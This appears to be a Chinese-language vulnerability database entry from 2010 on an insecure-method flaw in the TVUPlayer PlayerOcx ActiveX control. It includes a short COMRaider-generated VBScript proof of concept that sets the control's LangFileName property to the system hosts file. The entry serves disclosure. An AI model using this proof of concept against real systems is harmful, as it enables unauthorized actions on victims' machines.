TVUPlayer PlayerOcx控件不安全方式调用漏洞

🗓️ 09 Feb 2010 00:00:00Reported by RootType

TVUPlayer PlayerOcx控件不安全方式调用漏洞. 漏洞通过调用不安全方式的PlayerOcx控件, 使恶意者执行未经授权的操作


                                                &lt;?XML version='1.0' standalone='yes' ?&gt;
&lt;package&gt;&lt;job id='DoneInVBS' debug='false' error='true'&gt;
&lt;object classid='clsid:18E6ED0D-08D1-4ED5-8771-E72B4E6EFFD8' id='target' /&gt;
&lt;script language='vbscript'&gt;

'File Generated by COMRaider v0.0.133 - http://labs.idefense.com

'Wscript.echo typename(target)

'for debugging/custom prolog
targetFile = &quot;C:\Program Files\Online TV Player 4\PlayerOcx.ocx&quot;
prototype = &quot;Property Let LangFileName As String&quot;
memberName = &quot;LangFileName&quot;
progid = &quot;PlayerOcx.FormPlayer&quot;
argCount = 1

arg1=&quot;C:\WINDOWS\system32\drivers\etc\hosts&quot;

target.LangFileName = arg1

&lt;/script&gt;&lt;/job&gt;&lt;/package&gt;

09 Feb 2010 00:00Current

7.1High risk

Vulners AI Score7.1

tvuplayer playerocx漏洞控件不安全方式调用恶意操作